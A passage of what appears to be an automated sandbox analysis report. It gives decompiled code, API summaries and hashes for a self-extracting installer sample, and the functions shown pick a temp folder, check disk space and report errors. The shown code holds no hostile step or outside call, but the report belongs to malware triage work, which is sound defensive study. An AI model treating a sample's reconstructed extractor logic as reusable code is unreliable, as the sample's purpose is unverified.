                                                                                                                                                                                                                                                																				_t88 =  &_v268;
                                                                                                                                                                                                                                                																				E0010658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                                																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                                																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                                																					__eflags = _t54;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																				__eflags = _t54;
                                                                                                                                                                                                                                                																				if(_t54 != 0) {
                                                                                                                                                                                                                                                																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                                																					_push(_t88);
                                                                                                                                                                                                                                                																					_t109 = 0x1091e4;
                                                                                                                                                                                                                                                																					E00101781(0x1091e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                                																					_t101 = 1;
                                                                                                                                                                                                                                                																					_t59 = E00105467(0x1091e4, 1, 0);
                                                                                                                                                                                                                                                																					__eflags = _t59;
                                                                                                                                                                                                                                                																					if(_t59 != 0) {
                                                                                                                                                                                                                                                																						goto L45;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						_t60 = _v268;
                                                                                                                                                                                                                                                																						goto L42;
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                                																					_v265 = 0;
                                                                                                                                                                                                                                                																					_v268 = _t60;
                                                                                                                                                                                                                                                																					goto L42;
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				_t65 = E00102630(0,  &_v268, 1);
                                                                                                                                                                                                                                                																				__eflags = _t65;
                                                                                                                                                                                                                                                																				if(_t65 != 0) {
                                                                                                                                                                                                                                                																					goto L28;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t67 = E0010597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                                																					__eflags = _t67;
                                                                                                                                                                                                                                                																					if(_t67 == 0) {
                                                                                                                                                                                                                                                																						goto L28;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						goto L33;
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			goto L28;
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00105467(0x1091e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x1091e4;
											_t70 = E00102630(0, 0x1091e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x1091e4;
												_t71 = E00105467(0x1091e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0010597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x108b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00105467(0x108b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E001044B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x109124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x109124 = E00106285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00106CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

                                                                                                                                                                                                                                                0x0010572e
                                                                                                                                                                                                                                                0x00105742
                                                                                                                                                                                                                                                0x00105742
                                                                                                                                                                                                                                                0x00105745
                                                                                                                                                                                                                                                0x0010576b
                                                                                                                                                                                                                                                0x0010576b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105747
                                                                                                                                                                                                                                                0x00105747
                                                                                                                                                                                                                                                0x0010574d
                                                                                                                                                                                                                                                0x0010574f
                                                                                                                                                                                                                                                0x00105771
                                                                                                                                                                                                                                                0x00105771
                                                                                                                                                                                                                                                0x00105773
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105751
                                                                                                                                                                                                                                                0x00105751
                                                                                                                                                                                                                                                0x00105753
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105755
                                                                                                                                                                                                                                                0x0010575b
                                                                                                                                                                                                                                                0x00105760
                                                                                                                                                                                                                                                0x00105762
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105764
                                                                                                                                                                                                                                                0x00105764
                                                                                                                                                                                                                                                0x00105769
                                                                                                                                                                                                                                                0x0010577e
                                                                                                                                                                                                                                                0x0010577e
                                                                                                                                                                                                                                                0x00105781
                                                                                                                                                                                                                                                0x00105788
                                                                                                                                                                                                                                                0x0010578d
                                                                                                                                                                                                                                                0x0010578f
                                                                                                                                                                                                                                                0x001057b2
                                                                                                                                                                                                                                                0x001057b8
                                                                                                                                                                                                                                                0x001057bd
                                                                                                                                                                                                                                                0x001057bf
                                                                                                                                                                                                                                                0x001057cd
                                                                                                                                                                                                                                                0x001057cd
                                                                                                                                                                                                                                                0x001057dd
                                                                                                                                                                                                                                                0x001057e3
                                                                                                                                                                                                                                                0x001057ef
                                                                                                                                                                                                                                                0x001057f5
                                                                                                                                                                                                                                                0x001057f8
                                                                                                                                                                                                                                                0x0010580a
                                                                                                                                                                                                                                                0x0010580a
                                                                                                                                                                                                                                                0x001057fa
                                                                                                                                                                                                                                                0x00105802
                                                                                                                                                                                                                                                0x00105802
                                                                                                                                                                                                                                                0x0010580d
                                                                                                                                                                                                                                                0x0010580f
                                                                                                                                                                                                                                                0x00105830
                                                                                                                                                                                                                                                0x00105836
                                                                                                                                                                                                                                                0x0010583d
                                                                                                                                                                                                                                                0x0010584b
                                                                                                                                                                                                                                                0x00105851
                                                                                                                                                                                                                                                0x00105855
                                                                                                                                                                                                                                                0x0010585a
                                                                                                                                                                                                                                                0x0010585c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010585e
                                                                                                                                                                                                                                                0x0010585e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010585e
                                                                                                                                                                                                                                                0x00105811
                                                                                                                                                                                                                                                0x00105817
                                                                                                                                                                                                                                                0x00105819
                                                                                                                                                                                                                                                0x0010581f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010581f
                                                                                                                                                                                                                                                0x00105791
                                                                                                                                                                                                                                                0x00105797
                                                                                                                                                                                                                                                0x0010579c
                                                                                                                                                                                                                                                0x0010579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001057a0
                                                                                                                                                                                                                                                0x001057a9
                                                                                                                                                                                                                                                0x001057ae
                                                                                                                                                                                                                                                0x001057b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001057b0
                                                                                                                                                                                                                                                0x0010579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105769
                                                                                                                                                                                                                                                0x00105762
                                                                                                                                                                                                                                                0x00105753
                                                                                                                                                                                                                                                0x0010574f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010572e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105864
                                                                                                                                                                                                                                                0x00105864
                                                                                                                                                                                                                                                0x00105864
                                                                                                                                                                                                                                                0x00105717
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001056c3
                                                                                                                                                                                                                                                0x001056c5
                                                                                                                                                                                                                                                0x001056c9
                                                                                                                                                                                                                                                0x001056ce
                                                                                                                                                                                                                                                0x001056d0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001056d6
                                                                                                                                                                                                                                                0x001056d6
                                                                                                                                                                                                                                                0x001056d8
                                                                                                                                                                                                                                                0x001056dd

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001055CF
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00105638
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0010564C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00105620
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001056B9
                                                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0010571E
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00105737
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001057CD
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001057EF
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00105802
                                                                                                                                                                                                                                                  • Part of subcall function 00102630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00102654
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00105830
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: FindResourceA.KERNEL32(00100000,000007D6,00000005), ref: 0010652A
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: LoadResource.KERNEL32(00100000,00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00106538
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: DialogBoxIndirectParamA.USER32(00100000,00000000,00000547,001019E0,00000000), ref: 00106557
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: FreeResource.KERNEL32(00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00106560
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00105878
                                                                                                                                                                                                                                                  • Part of subcall function 0010597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001059A8
                                                                                                                                                                                                                                                  • Part of subcall function 0010597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001059AF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                • API String ID: 2436801531-3708386018
                                                                                                                                                                                                                                                • Opcode ID: 1b6684f319638012dbf474f8bd8beece69b17072e4131e221a1993ff31758d15
                                                                                                                                                                                                                                                • Instruction ID: 02a1ad5bed5cb68c6da3958314e7c9eb004d37c026fce83f3391524fc7f90303
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b6684f319638012dbf474f8bd8beece69b17072e4131e221a1993ff31758d15
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26812BB0A04A089BDB24AB359C95BEF766F9F64300F844066F9C6D21D1EFF48DC18E61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 324 10597d-1059b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1059bb-1059d8 call 1044b9 call 106285 324->325 326 1059dd-105a1b GetDiskFreeSpaceA 324->326 341 105c05-105c14 call 106ce0 325->341 327 105ba1-105bde memset call 106285 GetLastError FormatMessageA 326->327 328 105a21-105a4a MulDiv 326->328 338 105be3-105bfc call 1044b9 SetCurrentDirectoryA 327->338 328->327 331 105a50-105a6c GetVolumeInformationA 328->331 334 105ab5-105aca SetCurrentDirectoryA 331->334 335 105a6e-105ab0 memset call 106285 GetLastError FormatMessageA 331->335 340 105acc-105ad1 334->340 335->338 351 105c02 338->351 344 105ae2-105ae4 340->344 345 105ad3-105ad8 340->345 349 105ae6 344->349 350 105ae7-105af8 344->350 345->344 347 105ada-105ae0 345->347 347->340 347->344 349->350 353 105af9-105afb 350->353 354 105c04 351->354 355 105b05-105b08 353->355 356 105afd-105b03 353->356 354->341 357 105b20-105b27 355->357 358 105b0a-105b1b call 1044b9 355->358 356->353 356->355 360 105b52-105b5b 357->360 361 105b29-105b33 357->361 358->351 364 105b62-105b6d 360->364 361->360 363 105b35-105b50 361->363 363->364 365 105b76-105b7d 364->365 366 105b6f-105b74 364->366 368 105b83 365->368 369 105b7f-105b81 365->369 367 105b85 366->367 370 105b96-105b9f 367->370 371 105b87-105b94 call 10268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                			E0010597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v788;
                                                                                                                                                                                                                                                				long _v792;
                                                                                                                                                                                                                                                				long _v796;
                                                                                                                                                                                                                                                				long _v800;
                                                                                                                                                                                                                                                				signed int _v804;
                                                                                                                                                                                                                                                				long _v808;
                                                                                                                                                                                                                                                				int _v812;
                                                                                                                                                                                                                                                				long _v816;
                                                                                                                                                                                                                                                				long _v820;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				signed int _t55;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				int _t69;
                                                                                                                                                                                                                                                				signed int _t73;
                                                                                                                                                                                                                                                				signed short _t78;
                                                                                                                                                                                                                                                				signed int _t87;
                                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                                				int _t102;
                                                                                                                                                                                                                                                				unsigned int _t103;
                                                                                                                                                                                                                                                				unsigned int _t105;
                                                                                                                                                                                                                                                				signed int _t111;
                                                                                                                                                                                                                                                				long _t112;
                                                                                                                                                                                                                                                				signed int _t116;
                                                                                                                                                                                                                                                				CHAR* _t118;
                                                                                                                                                                                                                                                				signed int _t119;
                                                                                                                                                                                                                                                				signed int _t120;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t114 = __edi;
                                                                                                                                                                                                                                                				_t46 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                                				_v804 = __edx;
                                                                                                                                                                                                                                                				_t118 = __ecx;
                                                                                                                                                                                                                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                                				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                                				if(_t50 != 0) {
                                                                                                                                                                                                                                                					_push(__edi);
                                                                                                                                                                                                                                                					_v796 = 0;
                                                                                                                                                                                                                                                					_v792 = 0;
                                                                                                                                                                                                                                                					_v800 = 0;
                                                                                                                                                                                                                                                					_v808 = 0;
                                                                                                                                                                                                                                                					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                                					__eflags = _t55;
                                                                                                                                                                                                                                                					if(_t55 == 0) {
                                                                                                                                                                                                                                                						L29:
                                                                                                                                                                                                                                                						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                                						 *0x109124 = E00106285();
                                                                                                                                                                                                                                                						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                                						_t110 = 0x4b0;
                                                                                                                                                                                                                                                						L30:
                                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                                						E001044B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                                						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                                						L31:
                                                                                                                                                                                                                                                						_t66 = 0;
                                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                                						L32:
                                                                                                                                                                                                                                                						_pop(_t114);
                                                                                                                                                                                                                                                						goto L33;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                                					_v812 = _t69;
                                                                                                                                                                                                                                                					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                                					__eflags = _t116;
                                                                                                                                                                                                                                                					if(_t116 == 0) {
                                                                                                                                                                                                                                                						goto L29;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                                					__eflags = _t73;
                                                                                                                                                                                                                                                					if(_t73 != 0) {
                                                                                                                                                                                                                                                						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                                						_t101 =  &_v16;
                                                                                                                                                                                                                                                						_t111 = 6;
                                                                                                                                                                                                                                                						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                                						__eflags = _t119;
                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                                							__eflags = _t22;
                                                                                                                                                                                                                                                							if(_t22 == 0) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                                							__eflags = _t87;
                                                                                                                                                                                                                                                							if(_t87 == 0) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *_t101 = _t87;
                                                                                                                                                                                                                                                							_t101 = _t101 + 1;
                                                                                                                                                                                                                                                							_t111 = _t111 - 1;
                                                                                                                                                                                                                                                							__eflags = _t111;
                                                                                                                                                                                                                                                							if(_t111 != 0) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t111;
                                                                                                                                                                                                                                                						if(_t111 == 0) {
                                                                                                                                                                                                                                                							_t101 = _t101 - 1;
                                                                                                                                                                                                                                                							__eflags = _t101;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *_t101 = 0;
                                                                                                                                                                                                                                                						_t112 = 0x200;
                                                                                                                                                                                                                                                						_t102 = _v812;
                                                                                                                                                                                                                                                						_t78 = 0;
                                                                                                                                                                                                                                                						_t118 = 8;
                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                                							if(_t102 == _t112) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                                							_t78 = _t78 + 1;
                                                                                                                                                                                                                                                							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                                							if(_t78 < _t118) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                                						if(_t78 != _t118) {
                                                                                                                                                                                                                                                							__eflags =  *0x109a34 & 0x00000008;
                                                                                                                                                                                                                                                							if(( *0x109a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                                								L20:
                                                                                                                                                                                                                                                								_t103 =  *0x109a38; // 0x0
                                                                                                                                                                                                                                                								_t110 =  *((intOrPtr*)(0x1089e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                								L21:
                                                                                                                                                                                                                                                								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                                								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                                									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                                									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								if(__eflags <= 0) {
                                                                                                                                                                                                                                                									 *0x109124 = 0;
                                                                                                                                                                                                                                                									_t66 = 1;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t66 = E0010268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                                							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                                								goto L20;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t105 =  *0x109a38; // 0x0
                                                                                                                                                                                                                                                							_t110 =  *((intOrPtr*)(0x1089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1089e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                							_t103 = (_t105 >> 2) +  *0x109a38;
                                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t110 = 0x4c5;
                                                                                                                                                                                                                                                						E001044B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						goto L31;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                                					 *0x109124 = E00106285();
                                                                                                                                                                                                                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                                					_t110 = 0x4f9;
                                                                                                                                                                                                                                                					goto L30;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t110 = 0x4bc;
                                                                                                                                                                                                                                                					E001044B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					 *0x109124 = E00106285();
                                                                                                                                                                                                                                                					_t66 = 0;
                                                                                                                                                                                                                                                					L33:
                                                                                                                                                                                                                                                					return E00106CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                                                0x00105af6
                                                                                                                                                                                                                                                0x00105af8
                                                                                                                                                                                                                                                0x00105af9
                                                                                                                                                                                                                                                0x00105af9
                                                                                                                                                                                                                                                0x00105afb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105afd
                                                                                                                                                                                                                                                0x00105aff
                                                                                                                                                                                                                                                0x00105b00
                                                                                                                                                                                                                                                0x00105b03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b03
                                                                                                                                                                                                                                                0x00105b05
                                                                                                                                                                                                                                                0x00105b08
                                                                                                                                                                                                                                                0x00105b20
                                                                                                                                                                                                                                                0x00105b27
                                                                                                                                                                                                                                                0x00105b52
                                                                                                                                                                                                                                                0x00105b52
                                                                                                                                                                                                                                                0x00105b5b
                                                                                                                                                                                                                                                0x00105b62
                                                                                                                                                                                                                                                0x00105b6b
                                                                                                                                                                                                                                                0x00105b6d
                                                                                                                                                                                                                                                0x00105b76
                                                                                                                                                                                                                                                0x00105b7d
                                                                                                                                                                                                                                                0x00105b83
                                                                                                                                                                                                                                                0x00105b7f
                                                                                                                                                                                                                                                0x00105b7f
                                                                                                                                                                                                                                                0x00105b7f
                                                                                                                                                                                                                                                0x00105b6f
                                                                                                                                                                                                                                                0x00105b72
                                                                                                                                                                                                                                                0x00105b72
                                                                                                                                                                                                                                                0x00105b85
                                                                                                                                                                                                                                                0x00105b98
                                                                                                                                                                                                                                                0x00105b9e
                                                                                                                                                                                                                                                0x00105b87
                                                                                                                                                                                                                                                0x00105b8f
                                                                                                                                                                                                                                                0x00105b8f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b85
                                                                                                                                                                                                                                                0x00105b29
                                                                                                                                                                                                                                                0x00105b33
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b35
                                                                                                                                                                                                                                                0x00105b48
                                                                                                                                                                                                                                                0x00105b4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b4a
                                                                                                                                                                                                                                                0x00105b0f
                                                                                                                                                                                                                                                0x00105b16
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105b16
                                                                                                                                                                                                                                                0x00105a7c
                                                                                                                                                                                                                                                0x00105a8a
                                                                                                                                                                                                                                                0x00105aa5
                                                                                                                                                                                                                                                0x00105aab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001059bb
                                                                                                                                                                                                                                                0x001059c0
                                                                                                                                                                                                                                                0x001059c7
                                                                                                                                                                                                                                                0x001059d1
